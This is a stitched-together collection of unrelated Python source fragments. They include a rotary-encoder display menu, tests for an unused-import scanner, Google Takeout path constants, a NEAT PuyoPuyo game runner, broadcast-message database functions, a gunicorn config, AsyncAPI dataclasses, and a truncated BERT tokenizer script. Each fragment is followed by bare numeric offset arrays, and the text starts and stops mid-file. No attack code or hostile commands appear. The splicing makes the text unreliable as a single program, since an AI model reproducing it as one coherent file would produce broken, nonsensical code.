self.draw.rectangle([(0, 10 * idx), (10 * idx + self.dimensions[0], 1 + 10 * idx + 10)], outline = 0, fill = 0)
self.draw.text((1, 10 * idx), row, font = self.font, fill = 255)
self.disp.image(self.image)
self.disp.display()
class Menu():
def __init__(self, disp, encoder, items = []):
self.items = items
self.pointer = 0
self.row = 0
self.last_row = 0
self.last_slice = None
self.disp = Display(disp)
self.disp.init_display()
self.draw()
def encoder_ev (direction):
if direction == 1:
self.prev()
elif direction == 2:
self.next()
elif direction == 3:
self.exec_item()
self.encoder = RotaryEncoder(encoder["pin1"], encoder["pin2"], encoder["sw"], encoder_ev)
def draw(self):
tmp_slice = None
if self.row == self.last_row:
if self.last_row == 0:
tmp_slice = self.items[self.pointer:self.pointer + 3]
else:
tmp_slice = self.items[self.pointer - 2:self.pointer + 1]
self.disp.draw_rows(tmp_slice, self.row)
self.last_slice = tmp_slice
else:
self.disp.draw_rows(self.last_slice, self.row)
self.last_row = self.row
def next(self):
if self.pointer + 1 <= len(self.items) - 1:
self.pointer += 1
if self.row < 2:
self.row += 1
self.draw()
def prev(self):
if self.pointer - 1 >= 0:
self.pointer -= 1
if self.row > 0:
self.row -= 1
self.draw()
def exec_item(self):
print("Item selcted", str(self.pointer))
| [
[
[
16,
21
],
[
259,
264
]
],
[
[
38,
47
],
[
311,
320
]
],
[
[
64,
73
],
[
358,
367
]
],
[
[
99,
112
],
[
1888,
1901
]
],
[
[
120,
127
],
[
1575,
1582
]
],
[
[
1366,
1370
]
]
] |
from tests.analyzer.utils import UnusedTestCase
from unimport.statement import Import, ImportFrom
class AsImportTestCase(UnusedTestCase):
def test_as_import_all_unused_all_cases(self):
self.assertSourceAfterScanningEqualToExpected(
"""\
from x import y as z
import x
from t import s as ss
from f import a as c, l as k, i as ii
from fo import (bar, i, x as z)
import le as x
""",
[
ImportFrom(
lineno=1,
column=1,
name="z",
package="x",
star=False,
suggestions=[],
),
Import(
lineno=2,
column=1,
name="x",
package="x",
),
ImportFrom(
lineno=3,
column=1,
name="ss",
package="t",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=1,
name="c",
package="f",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=2,
name="k",
package="f",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=3,
name="ii",
package="f",
star=False,
suggestions=[],
),
ImportFrom(
lineno=5,
column=1,
name="bar",
package="fo",
star=False,
suggestions=[],
),
ImportFrom(
lineno=5,
column=2,
name="i",
package="fo",
star=False,
suggestions=[],
),
ImportFrom(
lineno=5,
column=3,
name="z",
package="fo",
star=False,
suggestions=[],
),
Import(
lineno=6,
column=1,
name="x",
package="le",
),
],
)
def test_as_import_one_used_in_function_all_cases(self):
self.assertSourceAfterScanningEqualToExpected(
"""\
from x import y as z
import x
from t import s as ss
from f import a as c, l as k, i as ii
from fo import (bar, i, x as z)
import le as x
def x(t=x):pass
""",
[
ImportFrom(
lineno=1,
column=1,
name="z",
package="x",
star=False,
suggestions=[],
),
Import(
lineno=2,
column=1,
name="x",
package="x",
),
ImportFrom(
lineno=3,
column=1,
name="ss",
package="t",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=1,
name="c",
package="f",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=2,
name="k",
package="f",
star=False,
suggestions=[],
),
ImportFrom(
lineno=4,
column=3,
name="ii",
package="f",
star=False,
suggestions=[],
),
ImportFrom(
lineno=5,
column=1,
name="bar",
package="fo",
star=False,
suggestions=[],
),
ImportFrom(
lineno=5,
column=2,
name="i",
package="fo",
star=False,
suggestions=[],
),
ImportFrom(
lineno=5,
column=3,
name="z",
package="fo",
star=False,
suggestions=[],
),
],
)
| [
[
[
33,
47
],
[
123,
137
]
],
[
[
79,
85
],
[
757,
763
],
[
2596,
2602
],
[
3428,
3434
]
],
[
[
87,
97
],
[
519,
529
],
[
923,
933
],
[
1162,
1172
],
[
1400,
1410
],
[
1638,
1648
],
[
1877,
1887
],
[
2118,
2128
],
[
2357,
2367
],
[
3190,
3200
],
[
3594,
3604
],
[
3833,
3843
],
[
4071,
4081
],
[
4309,
4319
],
[
4548,
4558
],
[
4789,
4799
],
[
5028,
5038
]
],
[
[
106,
122
]
]
] |
import os
from .takeout_sqlite3 import SQLite3
import multiprocessing
CONTACTS = 'Contacts' + os.sep + 'All Contacts' + os.sep + 'All Contacts.vcf'
DRIVE = 'Drive'
MY_ACTIVITY_ASSISTANT_PATH = 'My Activity' + os.sep + 'Assistant' + os.sep + 'MyActivity.html'
MY_ACTIVITY_GMAIL_PATH = 'My Activity' + os.sep + 'Gmail' + os.sep + 'MyActivity.html'
MY_ACTIVITY_GOOGLE_ANALYTICS_PATH = 'My Activity' + os.sep + 'Google Analytics' + os.sep + 'MyActivity.html'
MY_ACTIVITY_YOUTUBE_PATH = 'My Activity' + os.sep + 'YouTube' + os.sep + 'MyActivity.html'
MY_ACTIVITY_VIDEO_SEARCH_PATH = 'My Activity' + os.sep + 'Video Search' + os.sep + 'MyActivity.html'
MY_ACTIVITY_VOICE_AUDIO_PATH = 'My Activity' + os.sep + 'Voice and Audio' + os.sep + 'MyActivity.html'
MY_ACTIVITY_MAPS_PATH = 'My Activity' + os.sep + 'Maps' + os.sep + 'MyActivity.html'
MY_ACTIVITY_ANDROID_PATH = 'My Activity' + os.sep + 'Android' + os.sep + 'MyActivity.html'
MY_ACTIVITY_CHROME_PATH = 'My Activity' + os.sep + 'Chrome' + os.sep + 'MyActivity.html'
class Case(object):
def __init__(self, input_dir):
self.number_of_system_processes = 1
self.number_of_input_processes = 1
self.input_dir_path = input_dir
self.set_file_path()
def set_file_path(self):
if self.input_dir_path[-1] == os.sep:
self.input_dir_path = self.input_dir_path[:-1]
self.takeout_path = self.input_dir_path + os.sep + 'Takeout'
if not os.path.exists(self.takeout_path):
return False
self.takeout_contacts_path = self.takeout_path + os.sep + CONTACTS
self.takeout_drive_path = self.takeout_path + os.sep + DRIVE
self.takeout_my_activity_assistant_path = self.takeout_path + os.sep + MY_ACTIVITY_ASSISTANT_PATH
self.takeout_my_activity_gmail_path = self.takeout_path + os.sep + MY_ACTIVITY_GMAIL_PATH
self.takeout_my_activity_google_analytics_path = self.takeout_path + os.sep + MY_ACTIVITY_GOOGLE_ANALYTICS_PATH
self.takeout_my_activity_youtube_path = self.takeout_path + os.sep + MY_ACTIVITY_YOUTUBE_PATH
self.takeout_my_activity_video_search_path = self.takeout_path + os.sep + MY_ACTIVITY_VIDEO_SEARCH_PATH
self.takeout_my_activity_voice_audio_path = self.takeout_path + os.sep + MY_ACTIVITY_VOICE_AUDIO_PATH
self.takeout_my_activity_maps_path = self.takeout_path + os.sep + MY_ACTIVITY_MAPS_PATH
self.takeout_my_activity_android_path = self.takeout_path + os.sep + MY_ACTIVITY_ANDROID_PATH
self.takeout_my_activity_chrome_path = self.takeout_path + os.sep + MY_ACTIVITY_CHROME_PATH
| [
[
[
7,
9
],
[
95,
97
],
[
121,
123
],
[
211,
213
],
[
234,
236
],
[
302,
304
],
[
321,
323
],
[
400,
402
],
[
430,
432
],
[
500,
502
],
[
521,
523
],
[
596,
598
],
[
622,
624
],
[
696,
698
],
[
725,
727
],
[
792,
794
],
[
810,
812
],
[
880,
882
],
[
901,
903
],
[
970,
972
],
[
990,
992
],
[
1263,
1265
],
[
1366,
1368
],
[
1394,
1396
],
[
1497,
1499
],
[
1563,
1565
],
[
1642,
1644
],
[
1738,
1740
],
[
1841,
1843
],
[
1946,
1948
],
[
2047,
2049
],
[
2152,
2154
],
[
2249,
2251
],
[
2342,
2344
],
[
2437,
2439
]
],
[
[
39,
46
]
],
[
[
54,
69
]
],
[
[
71,
79
],
[
1506,
1514
]
],
[
[
149,
154
],
[
1572,
1577
]
],
[
[
166,
192
],
[
1651,
1677
]
],
[
[
261,
283
],
[
1747,
1769
]
],
[
[
348,
381
],
[
1850,
1883
]
],
[
[
457,
481
],
[
1955,
1979
]
],
[
[
548,
577
],
[
2056,
2085
]
],
[
[
649,
677
],
[
2161,
2189
]
],
[
[
752,
773
],
[
2258,
2279
]
],
[
[
837,
861
],
[
2351,
2375
]
],
[
[
928,
951
],
[
2446,
2469
]
],
[
[
1025,
1029
]
]
] |
from __future__ import print_function
import os
import pickle
import time
from gym_puyopuyo import register
import gym
import numpy as np
import neat
import visualize
piece_shape = (3, 2)
DRAW_NETS = False
NUM_COLORS = 3.0 # 3 colors in the small env mode
# TODO: could probably read color number from observation data
fn_results = "feedforward-small"
def multiplyMatrices(pieces, field, norm = True):
pieces = pieces.astype(np.float64)
field = field.astype(np.float64)
pieces_sum = np.zeros(piece_shape)
field_sum = np.zeros(field[0].shape)
for i in range(0, len(pieces)):
pieces[i] = np.multiply(pieces[i], i + 1)
if(norm):
pieces[i] /= NUM_COLORS
pieces_sum += pieces[i]
for i in range(0, len(field)):
field[i] = np.multiply(field[i], i + 1)
if(norm):
field[i] /= NUM_COLORS
field_sum += field[i]
return pieces_sum, field_sum
def run():
with open("results/winner-pickle-"+fn_results, 'rb') as f:
c = pickle.load(f)
print('loaded genome:')
print(c)
local_dir = os.path.dirname(__file__)
config_path = os.path.join(local_dir, 'config-feedforward-small')
config = neat.Config(neat.DefaultGenome, neat.DefaultReproduction,
neat.DefaultSpeciesSet, neat.DefaultStagnation,
config_path)
net = neat.nn.FeedForwardNetwork.create(c, config)
register()
env = gym.make("PuyoPuyoEndlessSmall-v2")
done = False
ob = env.reset()
count = 0
total_reward = 0
while True:
env.render()
#input()
time.sleep(0.5)
pieces_sum, field_sum = multiplyMatrices(ob[0], ob[1])
next_piece = pieces_sum[0]
inp_piece = np.ndarray.flatten(next_piece)
inp_field = np.ndarray.flatten(field_sum)
inputs = np.hstack([inp_piece, inp_field])
nn_output = net.activate(inputs)
action = np.argmax(nn_output)
#print(nn_output)
#nn_output = int(round(nn_output[0] * NUM_ACTIONS))
#print(nn_output)
#input()
ob, rew, done, info = env.step(action)
total_reward += rew
count += 1
if done:
break
print("Game played for ", count, " turns.")
print("Total score: ", total_reward)
if DRAW_NETS:
visualize.draw_net(config, c, view=True,
filename="results/winner-"+fn_results+".net")
visualize.draw_net(config, c, view=True,
filename="results/winner-"+fn_results+"-enabled.net",
show_disabled=False)
visualize.draw_net(config, c, view=True,
filename="results/winner-"+fn_results+"-pruned.net",
show_disabled=False, prune_unused=True)
if __name__ == '__main__':
run()
| [
[
[
23,
37
]
],
[
[
46,
48
],
[
1108,
1110
],
[
1152,
1154
]
],
[
[
56,
62
],
[
1026,
1032
]
],
[
[
70,
74
],
[
1637,
1641
]
],
[
[
101,
109
],
[
1444,
1452
]
],
[
[
117,
120
],
[
1465,
1468
]
],
[
[
128,
139
],
[
434,
436
],
[
471,
473
],
[
500,
502
],
[
538,
540
],
[
619,
621
],
[
789,
791
],
[
1784,
1786
],
[
1835,
1837
],
[
1882,
1884
],
[
1983,
1985
]
],
[
[
148,
152
],
[
1217,
1221
],
[
1229,
1233
],
[
1249,
1253
],
[
1299,
1303
],
[
1323,
1327
],
[
1395,
1399
]
],
[
[
160,
169
],
[
2406,
2415
],
[
2535,
2544
],
[
2717,
2726
]
],
[
[
171,
182
],
[
509,
520
]
],
[
[
192,
201
],
[
2387,
2396
]
],
[
[
210,
220
],
[
692,
702
],
[
860,
870
]
],
[
[
323,
333
],
[
990,
1000
],
[
2499,
2509
],
[
2628,
2638
],
[
2810,
2820
]
],
[
[
361,
377
],
[
1685,
1701
]
],
[
[
944,
947
],
[
2932,
2935
]
]
] |
import uuid
from app import db
from app.dao.dao_utils import transactional
from app.models import (
BroadcastMessage,
BroadcastEvent,
BroadcastProvider,
BroadcastProviderMessage,
BroadcastProviderMessageNumber,
BroadcastProviderMessageStatus
)
def dao_get_broadcast_message_by_id_and_service_id(broadcast_message_id, service_id):
return BroadcastMessage.query.filter(
BroadcastMessage.id == broadcast_message_id,
BroadcastMessage.service_id == service_id
).one()
def dao_get_broadcast_event_by_id(broadcast_event_id):
return BroadcastEvent.query.filter(BroadcastEvent.id == broadcast_event_id).one()
def dao_get_broadcast_messages_for_service(service_id):
return BroadcastMessage.query.filter(
BroadcastMessage.service_id == service_id
).order_by(BroadcastMessage.created_at)
def get_earlier_events_for_broadcast_event(broadcast_event_id):
"""
This is used to build up the references list.
"""
this_event = BroadcastEvent.query.get(broadcast_event_id)
return BroadcastEvent.query.filter(
BroadcastEvent.broadcast_message_id == this_event.broadcast_message_id,
BroadcastEvent.sent_at < this_event.sent_at
).order_by(
BroadcastEvent.sent_at.asc()
).all()
@transactional
def create_broadcast_provider_message(broadcast_event, provider):
broadcast_provider_message_id = uuid.uuid4()
provider_message = BroadcastProviderMessage(
id=broadcast_provider_message_id,
broadcast_event=broadcast_event,
provider=provider,
status=BroadcastProviderMessageStatus.SENDING,
)
db.session.add(provider_message)
db.session.commit()
provider_message_number = None
if provider == BroadcastProvider.VODAFONE:
provider_message_number = BroadcastProviderMessageNumber(
broadcast_provider_message_id=broadcast_provider_message_id)
db.session.add(provider_message_number)
db.session.commit()
return provider_message
| [
[
[
7,
11
],
[
1402,
1406
]
],
[
[
29,
31
],
[
1639,
1641
],
[
1676,
1678
],
[
1925,
1927
],
[
1973,
1975
]
],
[
[
62,
75
],
[
1286,
1299
]
],
[
[
105,
121
],
[
368,
384
],
[
407,
423
],
[
460,
476
],
[
726,
742
],
[
765,
781
],
[
822,
838
]
],
[
[
127,
141
],
[
582,
596
],
[
610,
624
],
[
1000,
1014
],
[
1057,
1071
],
[
1094,
1108
],
[
1174,
1188
],
[
1242,
1256
]
],
[
[
147,
164
],
[
1750,
1767
]
],
[
[
170,
194
],
[
1438,
1462
]
],
[
[
200,
230
],
[
1812,
1842
]
],
[
[
236,
266
],
[
1589,
1619
]
],
[
[
275,
321
]
],
[
[
520,
549
]
],
[
[
663,
701
]
],
[
[
857,
895
]
],
[
[
1304,
1337
]
]
] |
# ----------------------------------------------------------------------------
# - Open3D: www.open3d.org -
# ----------------------------------------------------------------------------
# The MIT License (MIT)
#
# Copyright (c) 2020 www.open3d.org
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# ----------------------------------------------------------------------------
"""
3D ML pipelines for PyTorch.
"""
import os as _os
from open3d import _build_config
if _build_config['BUNDLE_OPEN3D_ML']:
if 'OPEN3D_ML_ROOT' in _os.environ:
from ml3d.torch.pipelines import *
else:
from open3d._ml3d.torch.pipelines import *
| [
[
[
1480,
1489
],
[
1589,
1592
]
],
[
[
1509,
1522
],
[
1527,
1540
]
],
[
[
1643,
1644
]
],
[
[
1704,
1705
]
]
] |
import os
def to_bool(value):
return (
value is True or
(isinstance(value, str) and value.lower() in ['true', 'yes']) or
(isinstance(value, (int, float)) and value > 0)
)
bind = '0.0.0.0:{}'.format(os.getenv('GUNICORN_PORT', '8000'))
max_requests = int(os.getenv('GUNICORN_MAX_REQUESTS', '10000'))
max_requests_jitter = int(os.getenv('GUNICORN_MAX_REQUESTS_JITTER', '100'))
user = os.getenv('GUNICORN_USER', 'root')
keepalive = int(os.getenv('GUNICORN_KEEPALIVE', '70'))
reuse_port = to_bool(os.getenv('GUNICORN_REUSE_PORT', True))
accesslog = '-'
errorlog = '-'
print_config = True
workers = int(os.getenv('GUNICORN_WORKERS', '5'))
threads = int(os.getenv('GUNICORN_THREADS', '5'))
| [
[
[
7,
9
],
[
234,
236
],
[
289,
291
],
[
360,
362
],
[
417,
419
],
[
468,
470
],
[
529,
531
],
[
636,
638
],
[
686,
688
]
],
[
[
16,
23
],
[
521,
528
]
],
[
[
207,
211
]
],
[
[
270,
282
]
],
[
[
334,
353
]
],
[
[
410,
414
]
],
[
[
452,
461
]
],
[
[
508,
518
]
],
[
[
570,
579
]
],
[
[
586,
594
]
],
[
[
601,
613
]
],
[
[
622,
629
]
],
[
[
672,
679
]
]
] |
import pytest
from skidl import *
from .setup_teardown import *
def test_pin_names_1():
codec = Part("xess.lib", "ak4520a")
assert codec["ain"] == codec.n["ain"]
assert codec[1:4] == codec.p[1:4]
def test_pin_names_2():
codec = Part("xess.lib", "ak4520a")
codec[4].name = "A1"
codec[8].name = "A2"
codec[8].num = "A1"
assert codec[4] is codec.n["A1"]
assert codec.p[4] is codec.n["A1"]
assert codec[4] is codec.p[4]
assert codec.p["A1"] is codec.n["A2"]
assert codec["A1"] is codec.n["A2"]
assert codec["A1"] is codec.p["A1"]
| [
[
[
7,
13
]
],
[
[
33,
34
]
],
[
[
64,
65
],
[
104,
108
],
[
250,
254
]
],
[
[
72,
88
]
],
[
[
218,
234
]
]
] |
from dataclasses import dataclass
from dataclasses import field
from typing import Any
from typing import Callable
from typing import Mapping
from typing import Optional
from typing import Sequence
from typing import Type
from svarog import forge
from svarog import register_forge
from svarog.types import Forge
JSONMappingValue = Any
JSONMapping = Mapping[str, JSONMappingValue]
JSONSchema = JSONMapping
GLOBAL_NAMESPACE = "/"
@dataclass
class MessageAck:
"""The specification of a message acknowledgement"""
args: JSONSchema
@dataclass
class Message:
"""
https://www.asyncapi.com/docs/specifications/2.0.0#messageObject
The above message object is extended as follows:
* `x-handler`: Allows the coupling of the message specification to
an event handler (which is a python callable). It SHOULD only be used
for messages under a `publish` operation. Deserialized to `x_handler`.
* `x-ack`: The specification of the acknowledgement packet that the message receiver
transmits to the message sender. The acknowledgement args are passed as an input
to the callback of the `emit`/`send` function. Deserialized to `x_ack`.
The extentions are implemented as per:
https://www.asyncapi.com/docs/specifications/2.0.0#specificationExtensions
"""
name: str
payload: Optional[JSONSchema] = None
x_handler: Optional[str] = None
x_ack: Optional[MessageAck] = None
@staticmethod
def forge(type_: Type["Message"], data: JSONMapping, forge: Forge) -> "Message":
return type_(
name=forge(type_.__annotations__["name"], data["name"]),
payload=forge(type_.__annotations__["payload"], data.get("payload")),
x_handler=forge(type_.__annotations__["x_handler"], data.get("x-handler")),
x_ack=forge(type_.__annotations__["x_ack"], data.get("x-ack")),
)
register_forge(Message, Message.forge)
@dataclass
class OneOfMessages:
"""Using `oneOf` to specify multiple messages per operation"""
oneOf: Sequence[Message]
@staticmethod
def forge(
type_: Type["OneOfMessages"], data: JSONMapping, forge: Forge
) -> "OneOfMessages":
if "oneOf" in data:
return type_(
oneOf=forge(type_.__annotations__["oneOf"], data["oneOf"]),
)
return type_(oneOf=[forge(Message, data)])
def with_name(self, name: str) -> Optional[Message]:
for message in self.oneOf:
if message.name == name:
return message
return None
register_forge(OneOfMessages, OneOfMessages.forge)
@dataclass
class Operation:
"""https://www.asyncapi.com/docs/specifications/2.0.0#operationObject"""
message: OneOfMessages
@dataclass
class WebSocketsChannelBindings:
"""
https://github.com/asyncapi/bindings/tree/master/websockets#channel-binding-object
"""
method: Optional[str] = None
query: Optional[JSONSchema] = None
headers: Optional[JSONSchema] = None # TODO: Convert header properties to lowercase
bindingVersion: str = "latest"
@dataclass
class ChannelBindings:
"""https://www.asyncapi.com/docs/specifications/2.0.0#channelBindingsObject"""
ws: WebSocketsChannelBindings
@dataclass
class ChannelHandlers:
connect: Optional[str] = None
disconnect: Optional[str] = None
error: Optional[str] = None
@dataclass
class Channel:
"""
https://www.asyncapi.com/docs/specifications/2.0.0#channelItemObject
The above channel item object is extended to
support default namespace handlers as per:
https://www.asyncapi.com/docs/specifications/2.0.0#specificationExtensions
The `x_handlers` field is serialized as `x-handlers`.
"""
subscribe: Optional[Operation] = None
publish: Optional[Operation] = None
bindings: Optional[ChannelBindings] = None
x_handlers: Optional[ChannelHandlers] = None
def __post_init__(self):
if self.publish is not None:
for message in self.publish.message.oneOf:
if message.x_handler is None:
raise ValueError(
f"Message {message.name} is missing the x-handler attribute.\n"
"Every message under a publish operation "
"should have a handler defined."
)
@staticmethod
def forge(type_: Type["Channel"], data: JSONMapping, forge: Forge) -> "Channel":
return type_(
subscribe=forge(type_.__annotations__["subscribe"], data.get("subscribe")),
publish=forge(type_.__annotations__["publish"], data.get("publish")),
bindings=forge(type_.__annotations__["bindings"], data.get("bindings")),
x_handlers=forge(
type_.__annotations__["x_handlers"], data.get("x-handlers")
),
)
register_forge(Channel, Channel.forge)
@dataclass
class Server:
"""https://www.asyncapi.com/docs/specifications/2.0.0#serverObject"""
url: str
@dataclass
class AsyncApiSpec:
"""https://www.asyncapi.com/docs/specifications/2.0.0#A2SObject"""
channels: Mapping[str, Channel]
servers: Mapping[str, Server] = field(default_factory=dict)
@staticmethod
def from_dict(data: JSONMapping) -> "AsyncApiSpec":
return forge(AsyncApiSpec, data)
ErrorHandler = Callable[[Exception], None]
| [
[
[
24,
33
],
[
434,
443
],
[
544,
553
],
[
1927,
1936
],
[
2619,
2628
],
[
2754,
2763
],
[
3100,
3109
],
[
3254,
3263
],
[
3393,
3402
],
[
4917,
4926
],
[
5032,
5041
]
],
[
[
58,
63
],
[
5206,
5211
]
],
[
[
83,
86
],
[
333,
336
]
],
[
[
106,
114
],
[
5367,
5375
]
],
[
[
134,
141
],
[
351,
358
],
[
5148,
5155
],
[
5183,
5190
]
],
[
[
161,
169
],
[
1329,
1337
],
[
1372,
1380
],
[
1404,
1412
],
[
2913,
2921
],
[
2945,
2953
],
[
2986,
2994
],
[
3300,
3308
],
[
3337,
3345
],
[
3369,
3377
],
[
3758,
3766
],
[
3798,
3806
],
[
3839,
3847
],
[
3888,
3896
],
[
2420,
2428
]
],
[
[
189,
197
],
[
2037,
2045
]
],
[
[
217,
221
],
[
1472,
1476
],
[
2104,
2108
],
[
4401,
4405
]
],
[
[
242,
247
],
[
5324,
5329
]
],
[
[
267,
281
],
[
1885,
1899
],
[
2565,
2579
],
[
4875,
4889
]
],
[
[
307,
312
],
[
1515,
1520
],
[
2153,
2158
],
[
4444,
4449
]
],
[
[
314,
330
],
[
364,
380
]
],
[
[
337,
348
],
[
395,
406
],
[
1495,
1506
],
[
2133,
2144
],
[
4424,
4435
],
[
5277,
5288
]
],
[
[
382,
392
],
[
530,
540
],
[
1338,
1348
],
[
2954,
2964
],
[
2995,
3005
]
],
[
[
408,
424
]
],
[
[
450,
460
],
[
1413,
1423
]
],
[
[
560,
567
],
[
1900,
1907
],
[
1909,
1916
],
[
2046,
2053
],
[
2364,
2371
],
[
2429,
2436
]
],
[
[
1943,
1956
],
[
2580,
2593
],
[
2595,
2608
],
[
2737,
2750
]
],
[
[
2635,
2644
],
[
3767,
3776
],
[
3807,
3816
]
],
[
[
2770,
2795
],
[
3225,
3250
]
],
[
[
3116,
3131
],
[
3848,
3863
]
],
[
[
3270,
3285
],
[
3897,
3912
]
],
[
[
3409,
3416
],
[
4890,
4897
],
[
4899,
4906
],
[
5161,
5168
]
],
[
[
4933,
4939
],
[
5196,
5202
]
],
[
[
5048,
5060
],
[
5330,
5342
]
],
[
[
5352,
5364
]
]
] |
# -*- encoding: utf-8 -*-
# Module iaframe
from numpy import *
def iaframe(f, WT=1, HT=1, DT=0, k1=None, k2=None):
from ia870 import iaunion, iaintersec,ialimits
if k1 is None: k1 = ialimits(f)[1]
if k2 is None: k2 = ialimits(f)[0]
assert len(f.shape)==2,'Supports 2D only'
y = iaintersec(f,k2)
y[:,0:WT] = k1
y[:,-WT:] = k1
y[0:HT,:] = k1
y[-HT:,:] = k1
return y
| [
[
[
62,
63
]
],
[
[
69,
76
]
]
] |
import jwt
from contextlib import contextmanager
from datetime import datetime, timedelta
from sqlalchemy import Column, Integer, String, DateTime, Boolean
from sqlalchemy import ForeignKey, func
from sqlalchemy.orm import relationship
from saraki.auth import _request_ctx_stack, User, Org
from saraki.model import BaseModel, Model, database
class DummyBaseModel(BaseModel):
__tablename__ = "dummy_base_model"
id = Column(Integer, primary_key=True)
class DummyModel(Model):
__tablename__ = "dummy_model"
id = Column(Integer, primary_key=True)
class Person(Model):
__tablename__ = "person"
id = Column(Integer, primary_key=True)
firstname = Column(String, nullable=False)
lastname = Column(String, nullable=False)
age = Column(Integer, nullable=False)
def export_data(self, include=("id", "firstname"), exclude=()):
return super(Person, self).export_data(include, exclude)
class Product(BaseModel):
__tablename__ = "product"
id = Column(Integer, primary_key=True)
name = Column(String(120), nullable=False)
color = Column(String, default="white")
price = Column(Integer, default=0)
created_at = Column(DateTime, nullable=False, default=func.now())
updated_at = Column(DateTime, nullable=False, server_default=func.now())
enabled = Column(Boolean, default=False)
class Order(BaseModel):
__tablename__ = "order"
id = Column(Integer, primary_key=True)
customer_id = Column(Integer, ForeignKey("person.id"), nullable=False)
lines = relationship("OrderLine")
customer = relationship("Person", uselist=False)
class OrderLine(Model):
__tablename__ = "order_line"
order_id = Column(Integer, ForeignKey("order.id"), nullable=False, primary_key=True)
product_id = Column(
Integer, ForeignKey("product.id"), nullable=False, primary_key=True
)
unit_price = Column(Integer, nullable=False)
quantity = Column(Integer, default=1, nullable=False)
product = relationship("Product", uselist=False)
def export_data(self, include=(), exclude=()):
include = tuple(include) + ("product_id", "unit_price", "quantity")
return super(OrderLine, self).export_data(include, exclude)
class Cartoon(Model):
__tablename__ = "cartoon"
id = Column(Integer, primary_key=True)
name = Column(String(80), unique=True, nullable=False)
nickname = Column(String(80), unique=True)
class Todo(Model):
__tablename__ = "todo"
id = Column(Integer, primary_key=True)
org_id = Column(Integer, ForeignKey("org.id"), nullable=False)
task = Column(String(200), nullable=False)
def login(username, orgname=None, scope=None):
iat = datetime.utcnow()
exp = iat + timedelta(seconds=6000)
payload = {"iss": "acme.local", "sub": username, "iat": iat, "exp": exp}
if orgname:
payload.update({"aud": orgname, "scp": {"org": ["manage"]}})
if scope:
payload.update({"scp": scope})
token = jwt.encode(payload, "secret").decode()
return f"JWT {token}"
@contextmanager
def auth_ctx(username, orgname=None):
_request_ctx_stack.top.current_user = User(id=1, username=username)
if orgname:
_request_ctx_stack.top.current_org = Org(id=1, orgname=orgname)
yield
def reset_secuence(table, column_name="id", schema_name="public"):
table_name = f"{schema_name}.{table.__tablename__}"
sql = f"SELECT pg_get_serial_sequence('{table_name}', '{column_name}');"
secuence_name = database.engine.execute(sql).fetchone()[0]
if secuence_name is not None:
sql = f"ALTER SEQUENCE {secuence_name} RESTART WITH 1;"
database.engine.execute(sql)
| [
[
[
7,
10
],
[
3015,
3018
]
],
[
[
34,
48
],
[
3084,
3098
]
],
[
[
70,
78
],
[
2727,
2735
]
],
[
[
80,
89
],
[
2761,
2770
]
],
[
[
114,
120
],
[
428,
434
],
[
533,
539
],
[
630,
636
],
[
681,
687
],
[
728,
734
],
[
770,
776
],
[
1005,
1011
],
[
1051,
1057
],
[
1100,
1106
],
[
1145,
1151
],
[
1190,
1196
],
[
1261,
1267
],
[
1336,
1342
],
[
1432,
1438
],
[
1485,
1491
],
[
1711,
1717
],
[
1803,
1809
],
[
1911,
1917
],
[
1959,
1965
],
[
2317,
2323
],
[
2363,
2369
],
[
2427,
2433
],
[
2518,
2524
],
[
2566,
2572
],
[
2632,
2638
]
],
[
[
122,
129
],
[
435,
442
],
[
540,
547
],
[
637,
644
],
[
777,
784
],
[
1012,
1019
],
[
1152,
1159
],
[
1439,
1446
],
[
1492,
1499
],
[
1718,
1725
],
[
1819,
1826
],
[
1918,
1925
],
[
1966,
1973
],
[
2324,
2331
],
[
2525,
2532
],
[
2573,
2580
]
],
[
[
131,
137
],
[
688,
694
],
[
735,
741
],
[
1058,
1064
],
[
1107,
1113
],
[
2370,
2376
],
[
2434,
2440
],
[
2639,
2645
]
],
[
[
139,
147
],
[
1197,
1205
],
[
1268,
1276
]
],
[
[
149,
156
],
[
1343,
1350
]
],
[
[
180,
190
],
[
1501,
1511
],
[
1727,
1737
],
[
1828,
1838
],
[
2582,
2592
]
],
[
[
192,
196
],
[
1231,
1235
],
[
1309,
1313
]
],
[
[
224,
236
],
[
1555,
1567
],
[
1597,
1609
],
[
2017,
2029
]
],
[
[
262,
280
],
[
3142,
3160
],
[
3235,
3253
]
],
[
[
282,
286
],
[
3180,
3184
]
],
[
[
288,
291
],
[
3272,
3275
]
],
[
[
317,
326
],
[
367,
376
],
[
952,
961
],
[
1381,
1390
]
],
[
[
328,
333
],
[
481,
486
],
[
582,
587
],
[
1653,
1658
],
[
2268,
2273
],
[
2472,
2477
]
],
[
[
335,
343
],
[
3534,
3542
],
[
3684,
3692
]
],
[
[
352,
366
]
],
[
[
470,
480
]
],
[
[
575,
581
],
[
892,
898
]
],
[
[
944,
951
]
],
[
[
1375,
1380
]
],
[
[
1643,
1652
],
[
2205,
2214
]
],
[
[
2260,
2267
]
],
[
[
2467,
2471
]
],
[
[
2674,
2679
]
],
[
[
3103,
3111
]
],
[
[
3316,
3330
]
]
] |
from multiprocessing import Pool
import argparse
import glob
import os
import io
import time
import logging
import gluonnlp as nlp
import tokenizer as tokenization
parser = argparse.ArgumentParser(description='BERT tokenizer')
parser.add_argument('--input_files', type=str, default='wiki_*.doc',
help='Input files. Default is "wiki_*.doc"')
parser.add_argument('--nworker', type=int, default=8,
